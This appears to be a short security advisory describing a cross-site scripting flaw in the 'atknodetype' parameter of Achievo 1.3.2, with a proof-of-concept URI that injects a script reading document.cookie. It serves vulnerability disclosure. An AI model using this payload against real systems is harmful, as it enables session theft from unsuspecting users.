• info
• discussion
• exploit
• solution
• references

Achievo 'atknodetype' Parameter Cross Site Scripting Vulnerability

To exploit this issue an attacker entices an unsuspecting user into following a malicious URI.

The following proof-of-concept URI is available:

http://www.example.com/achievo-1.3.2/dispatch.php?atknodetype= >"><script%20%0a%0d>a lert(document.cookie)%3B</script>&atkaction=adminpim&atklevel=-1&atkprevlevel =0&achievo=cgvuu4c9nv45ofdq8ntv1inm82